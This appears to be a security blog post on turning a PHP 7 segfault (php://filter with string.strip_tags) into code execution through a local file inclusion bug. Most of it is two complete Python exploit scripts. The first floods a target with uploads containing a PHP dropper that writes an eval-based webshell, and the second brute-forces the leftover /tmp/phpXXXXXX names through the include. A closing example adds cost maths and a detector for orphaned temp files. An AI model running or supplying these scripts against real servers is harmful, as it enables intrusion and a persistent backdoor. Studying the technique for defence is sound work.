LFI via SegmentFault


A while ago I stumbled on a small PHP 7 bug by accident:

include.php?file=php://filter/string.strip_tags/resource=/etc/passwd

Including a file through the php://filter wrapper with the string.strip_tags filter makes PHP segfault in the middle of the request. That immediately suggests a use inside a local file inclusion (LFI) vulnerability. The write-ups linked below already describe the related trick: with LFI you can make PHP include itself, the unbounded recursion crashes the worker, and if the same request also carries a multipart file upload, the uploaded file is kept. PHP stores each upload in the temp directory (/tmp on this target) under a name of the form phpXXXXXX and deletes it only when the request ends normally; a crash never reaches that cleanup, so the file stays, and a later LFI request can include it once its name is known. The strip_tags segfault gives the same crash from one cheap request, with no recursion needed. The catch is the name: six characters from [0-9A-Za-z], 62^6 possibilities, so a single leftover file cannot be brute-forced in practice. Many leftover files have to be created first.



References:

https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

https://github.com/bl4de/security_whitepapers/blob/master/PHP_LFI_rfc1867_temporary_files.pdf

I wrote an exploit in two scripts: the first floods the crashing endpoint with uploads so that many temp files are left behind, the second walks the name space through the include until one of them hits.


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Script 1: flood the crashing include with multipart uploads so that the
# temp files PHP would normally delete are left behind in /tmp.

import base64
import string

import requests

# Alphabet of the six random characters after the "php" prefix of a temp name.
charset = string.digits + string.ascii_letters

host = "192.168.43.155"
port = 80
base_url = "http://%s:%d" % (host, port)

# Request that makes PHP 7 segfault. The worker dies before the end-of-request
# upload cleanup runs, so /tmp/phpXXXXXX survives.
segfault_url = ("%s/include.php?f=php://filter/string.strip_tags/resource=/etc/passwd"
                % base_url)


def upload_file_to_include(url, file_content):
    """POST one multipart upload to the crashing endpoint. The server is
    expected to die, so an empty reply or a reset connection is the normal
    outcome here, not an error worth stopping for."""
    files = {'file': ('evil.jpg', file_content, 'image/jpeg')}
    try:
        requests.post(url, files=files, timeout=10)
    except requests.RequestException as e:
        print(e)


def generate_tmp_files():
    # Dropper that runs when a leftover temp file is finally included: it
    # writes a permanent webshell so the random name only has to be hit once.
    # Encode exactly once, because base64_decode() on the PHP side decodes
    # once; the written file has to be valid PHP.
    webshell_content = base64.b64encode(b'<?php eval($_REQUEST[c]);?>').decode()
    file_content = ('<?php if(file_put_contents("/tmp/ssh_session_HD89q2", '
                    'base64_decode("%s"))){echo "flag";}?>' % webshell_content)
    length = 6
    # Leave 62**3 files behind: among 62**6 possible names that brings the
    # expected number of guesses in the brute-force script down to about 62**3.
    times = len(charset) ** (length // 2)
    for i in range(times):
        print("[+] %d / %d" % (i, times))
        upload_file_to_include(segfault_url, file_content)


def main():
    generate_tmp_files()


if __name__ == "__main__":
    main()
The second script guesses the leftover names through the include. It succeeds as soon as the dropper's marker shows up in a response, which means the webshell has been written to its fixed path.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Script 2: brute-force the leftover temp file name through the include.

import itertools
import string

import requests

charset = string.digits + string.ascii_letters

host = "192.168.43.155"
port = 80
base_url = "http://%s:%d" % (host, port)


def brute_force_tmp_files():
    """Try every /tmp/phpXXXXXX name (62**6 candidates, in lexicographic
    order) until the include returns the marker printed by the dropper.
    Returns True on success, False if the whole name space was exhausted."""
    for chars in itertools.product(charset, repeat=6):
        filename = ''.join(chars)
        url = "%s/include.php?f=/tmp/php%s" % (base_url, filename)
        print(url)
        try:
            response = requests.get(url, timeout=10)
            # "flag" is echoed only after file_put_contents() succeeded,
            # so the webshell now exists at /tmp/ssh_session_HD89q2.
            if 'flag' in response.text:
                print("[+] Include success!")
                return True
        except requests.RequestException as e:
            print(e)
    return False


def main():
    brute_force_tmp_files()


if __name__ == "__main__":
    main()
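The numbers behind the two scripts (why 62^3 uploads, and what that buys in include attempts) and the defender-side check for the files they leave behind, as an added example. This is my illustration, not code from the original post. It assumes that upload temp names are "php" plus six characters from [0-9A-Za-z] (62^6 names, the same charset the scripts use), that the /tmp listing is constructed rather than captured, and that the 5-minute orphan threshold is a made-up default; the function names are my own.

```python
#!/usr/bin/env python3
"""Added example (not code from the original post): the cost model behind the
two exploit scripts above and a defender-side check for the files they leave.

Assumptions, labelled here rather than taken from the page: upload temp names
are "php" plus six characters from [0-9A-Za-z] (62**6 names, the same charset
the scripts brute-force); which names survive a crash is independent of the
order in which the brute force walks the name space; the /tmp listing below
is constructed, and the 5-minute orphan threshold is a made-up default."""

import math
import re
from datetime import datetime, timedelta

CHARSET_SIZE = 62                              # digits + ASCII letters
NAME_LENGTH = 6
NAMESPACE = CHARSET_SIZE ** NAME_LENGTH        # 62**6 possible /tmp/phpXXXXXX names
TMPNAME_RE = re.compile(r"^php[0-9A-Za-z]{6}$")


def expected_guesses(leftover_files, namespace=NAMESPACE):
    """Expected include attempts until the first hit when `leftover_files`
    distinct names exist among `namespace` and the guesses never repeat, as
    with the lexicographic walk in the brute-force script: (S + 1) / (N + 1).
    With N = 62**3 this is about 62**3, which is why script 1 uploads that many."""
    if leftover_files <= 0:
        return float("inf")
    return (namespace + 1) / (leftover_files + 1)


def hit_probability(leftover_files, guesses, namespace=NAMESPACE):
    """Chance that at least one of `guesses` attempts hits a leftover file,
    using the with-replacement approximation (1 - N/S)**k for the miss
    chance; accurate while k is tiny next to S, as it is here."""
    return 1 - (1 - leftover_files / namespace) ** guesses


def uploads_for_budget(guess_budget, namespace=NAMESPACE):
    """Leftover files needed so that the expected brute force fits in
    `guess_budget` include requests; inverts expected_guesses()."""
    return max(1, math.ceil((namespace + 1) / guess_budget - 1))


def orphaned_upload_tmpfiles(entries, now, max_age=timedelta(minutes=5)):
    """Defender-side check. `entries` is a list of (name, mtime) pairs from a
    listing of upload_tmp_dir. PHP removes a request's upload temp files when
    the request ends, so a phpXXXXXX file far older than any request lifetime
    means the worker died before cleanup (segfault, self-include recursion,
    kill): the exact condition this technique relies on. Returns orphan names
    in listing order. A pile of them next to worker crashes in the server log
    is the footprint to look for; the fixed dropper path used above is a
    weaker indicator because it is trivial to rename."""
    return [name for name, mtime in entries
            if TMPNAME_RE.match(name) and now - mtime > max_age]


# Constructed sample listing of /tmp (not captured from a real system).
NOW = datetime(2016, 10, 9, 12, 0, 0)
SAMPLE_TMP = [
    ("phpa1B2c3", NOW - timedelta(hours=3)),            # orphan left by a crash
    ("phpZz9Yy8", NOW - timedelta(seconds=2)),          # upload in flight, normal
    ("php7Q4rT1", NOW - timedelta(minutes=40)),         # orphan
    ("phpsessid_x", NOW - timedelta(days=1)),           # not a temp-upload name
    ("ssh_session_HD89q2", NOW - timedelta(hours=2)),   # dropped shell, other pattern
    ("php-fpm.sock", NOW - timedelta(days=3)),          # not a temp-upload name
]


if __name__ == "__main__":
    n = 62 ** 3
    print("leftover files: %d, expected include guesses: %.1f" % (n, expected_guesses(n)))
    print("P(hit within 62**3 guesses): %.3f" % hit_probability(n, n))
    print("uploads needed for a 62**3 guess budget:", uploads_for_budget(n))
    print("orphaned upload temp files:", orphaned_upload_tmpfiles(SAMPLE_TMP, NOW))
```

The trade-off the model makes explicit: uploads and include guesses multiply to roughly 62^6, so the scripts split the work evenly at 62^3 each, and even then a full run of guesses only lands with about 63% probability. On the defending side, the orphan check is cheap to run from cron against upload_tmp_dir; any PHP worker crash, not just this bug, produces the same leftovers, so it doubles as a crash detector.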